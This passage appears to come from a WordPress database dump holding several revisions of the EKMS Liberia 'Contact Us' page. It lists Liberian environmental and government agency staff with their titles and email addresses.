\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-25 08:43:52','2021-03-25 08:43:52','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3629,42,'2021-03-25 08:48:32','2021-03-25 08:48:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p><p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel Ballah </strong><br />MGCSP<br /><a href=\"mailto:ballah_@yahoo.com\">ballah_@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-25 08:48:32','2021-03-25 08:48:32','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3630,42,'2021-03-25 08:48:32','2021-03-25 08:48:32','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />											\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior 